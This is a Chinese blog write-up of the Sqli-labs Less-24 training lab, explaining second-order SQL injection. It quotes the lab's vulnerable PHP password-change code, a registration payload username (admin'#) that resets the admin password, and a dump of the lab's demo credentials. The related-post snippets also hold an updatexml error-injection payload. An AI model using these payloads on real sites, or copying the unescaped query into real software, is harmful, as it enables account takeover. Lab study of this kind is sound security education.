Sqli-labs Less24 二次排序注入 - POST

最新推荐文章于 2024-04-08 12:13:19 发布
最新推荐文章于 2024-04-08 12:13:19 发布
阅读量791 收藏 1
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/81563432
版权

本文记录 SQL 注入的学习过程,资料为 SQLi

SQLi 博客目录

Less - 24: POST - Second Order Injections Real treat - Stored Injections

  1. 简介

    本关为二次排序注入的示范例。二次排序注入也成为存储型的注入,就是将可能导致 sql 注入的字符先存入到数据库中,当再次调用这个恶意构造的字符时,就可以出发 sql 注入。

  2. 二次排序注入思路

    1. 黑客通过构造数据的形式,在浏览器或者其他软件中提交 HTTP 数据报文请求到服务端进行处理,提交的数据报文请求中可能包含了黑客构造的 SQL 语句或者命令。

    2. 服务端应用程序会将黑客提交的数据信息进行存储,通常是保存在数据库中,保存的数据信息的主要作用是为应用程序执行其他功能提供原始输入数据并对客户端请求做出响应。

    3. 黑客向服务端发送第二个与第一次不相同的请求数据信息。

    4. 服务端接收到黑客提交的第二个请求信息后,为了处理该请求,服务端会查询数据库中已经存储的数据信息并处理,从而导致黑客在第一次请求中构造的 SQL 语句或者命令在服务端环境中执行。

    5. 服务端返回执行的处理结果数据信息,黑客可以通过返回的结果数据信息判断二次注入漏洞利用是否成功。

  3. 测试

    此例子中我们的步骤是注册一个 admin’# 的账号,接下来登录该帐号后进行修改密码。此时修改的就是admin 的密码。

    源代码

     $username= $_SESSION["username"];
 $curr_pass= mysql_real_escape_string($_POST['current_password']);
 $pass= mysql_real_escape_string($_POST['password']);
 $re_pass= mysql_real_escape_string($_POST['re_password']);
 if($pass==$re_pass)
 {
         $sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
         $res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
         $row = mysql_affected_rows();
 }

    使用 admin’# 进行注册的时候,SQL 语句变为

     $sql = "UPDATE users SET passwd="New_Pass" WHERE username =' admin' # ' AND password='$curr_pass' ";

    也就是执行了

     UPDATE users SET passwd="New_Pass" WHERE username ='admin'

  4. 步骤演示

    1. 注册 admin’# 账号

       username 输入 admin'#
 password 输入 111
 retry password 输入 111

    2. 查数据库中是否出现了这个用户

       mysql> select * from users;
 +----+----------+------------+
 | id | username | password   |
 +----+----------+------------+
 |  1 | Dumb     | Dumb       | 
 |  2 | Angelina | I-kill-you | 
 |  3 | Dummy    | p@ssword   | 
 |  4 | secure   | crappy     | 
 |  5 | stupid   | stupidity  | 
 |  6 | superman | genious    | 
 |  7 | batman   | mob!le     | 
 |  8 | admin    | admin      | 
 |  9 | admin1   | admin1     | 
 | 10 | admin2   | admin2     | 
 | 11 | admin3   | admin3     | 
 | 12 | dhakkan  | dumbo      | 
 | 14 | admin4   | admin4     | 
 | 15 | admin'#  | 111        | 
 +----+----------+------------+
 14 rows in set (0.00 sec)

    3. 登录 admin’#

       用户名输入 admin'#
 密码输入 111


     可以重置密码
网络安全打工人
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
基于Sqli-Labs靶场的SQL注入-23~24
Joker
01-04 1285
重点讲二次注入
SQL注入——sqli-labs第二十四关_sqli第二十四,资深网络安全开发带你入门Framework
2401_84103616的博客
04-04 856
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
sqli-labs第二十四关
m0_73248913的博客
02-20 406
sqlilabs第十四关
sqli-labs(24)
mmzkyl的博客
01-30 709
这个关卡可能有时候会出现一些小问题,有时候登陆后是没有修改密码的选项的,这是因为有时候解压时logged-in.php文件解压不正确,重新解压即可 本关卡为二次注入,其产生原因是:服务器端虽然对用户的直接输入做了一些过滤或者将一些字符进行转义,但是对于已经存入数据库的信息是完全信任的,即:不校验数据库信息是否合法 先来看看本关卡关于修改代码的部分: UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr
sqli--labs 进阶篇 23_24
Lucky小小吴的小屋
01-30 579
直接登录进入,通过注册一个含有特殊字符的账号,再修改密码,从而修改掉原本的数据库中已存在的账号信息。到这里,自己没有什么思路,不知道怎么注入,看了下题目讲到二阶注入,猜测我们需要在。pass_change.php 登录成功后,有更新操作的处理。源码文件,重要的只有四个,下面就依次看一下源码文件的具体功能。更新账号密码时,账户信息没有过滤,是直接更新的,可以利用!注册一个新的,账号:admin’# ,密码:123。进一步确定自己的推论,源码中,存在过滤掉一些注释语句。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs/Less-24
m0_71299382的博客
11-19 266
sqli-labs第二十四关
sqli-labs(宽字节less-33,二次less-24,update less-17,堆叠less-38)pikachu(insert,delete)
weixin_74182283的博客
04-03 707
堆叠注入可以执行的是任意的语句。x' or updatexml(1,concat(0x7e,version(),0x7e),1) or '1‘=’1 填入两个必填的字段ps(or前面的那个x可写可不写,只是用来装作一个用户,让前面闭合的语句为假而已,我就没写,别想太多。也先瞅眼代码◕‿◕,可以看到这里也进行了相关的过滤,比如这个substr 意味着如果使用substr只能截取0-15个的字符,后面这个strip是过滤了\,来防止一些转义字符的替换,下面那个就是上面宽字节的函数,也进行了限制。
SQL注入——sqli-labs第二十四关
lizhiiiii的博客
02-01 610
这一关我们使用二次注入,因为登录页面和注册页面都用了mysql_real_escape_string函数对于特殊字符转义。
Sqlilabs-24
KAKA的博客
07-14 776
这一关来到了二次注入的世界: 所谓的二次注入简单一句话:就是你在一个身份下面可以改其它身份的密码(数据) 不过在此之前想尝试一下报错注入在修改密码可不可以成功: ???让我更聪明更努力点??? ok,fine… 那就二次注入吧… 后台的修改密码的 SQL 语句如下: 试想,如果在注册的时候,就写入一个带过滤后边 SQL 与的字符的用户名会怎么样呢?比如:admin’# SQL 语句就变成了: UPDATE users SET PASSWORD='$pass' where username= 'admi
sqli第24二次注入
gchoud的博客
03-30 773
1,注册一个新用户admin'#虽然转义了,但特殊字符一起写进了数据库。2,用该用户更换密码,你更换的密码就是admin用户的密码。对已经注册的用户的username没有转义特殊字符。说以你去更新的是admin的密码。
sqli-labs第二十四关(二阶注入)
qq_42266432的博客
09-03 933
进入第二十四关,这关叫二阶注入,二阶注入个人感觉和存储型xss有些类似,大致分为以下几步: 攻击者在HTTP请求中提交恶意代码(可以是sql,js脚本等)。 应用将输存储在数据库以便后面使用并响应请求。 攻击者提交其他请求。 为处理其他请求,应用会检索已经存储的输入并处理它,从而导致攻击者注入的恶意代码被执行。 先去看看源码: login.php 中mysql_real_escape_string()函数可以转义 SQL 语句中使用的字符串中的特殊字符,无法注入 login_crea
SQL注入——sqli-labs第二十四关_sqli第二十四
最新发布
m0_60721695的博客
04-08 370
我们在修改密码界面正常填写我们注册的用户名 admin’# 修改密码为12345 然后我们通过断点调试查看一下 参数已经传进去了 效果如下为了方便理解我直接把admin’#输入到username方便看效果如图后面的语句就被我们注释掉了,这个时候我们改的密码就变成了管理员的密码。所以这个时候我们直接用admin作为用户名 用我们改的密码直接登录就可以直接进入管理员账户。
sqli-labs靶场-24-二次注入小应用
m0_73255659的博客
01-25 890
其实二次注入并不难理解 ,只不过可能用的比较困难需要很多的前提条件!
九、SQL-labs的第24关——二次注入Post
qq_73393033的博客
08-03 540
二次注入首先的一点就要在HTTP请求中提交恶意代码,将这个恶意代码存储在数据库中,以便后面使用。在第24关,我们是通过注册新账号这种方式,将恶意代码存储到数据库中。假设我们的攻击目标是Dummy。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值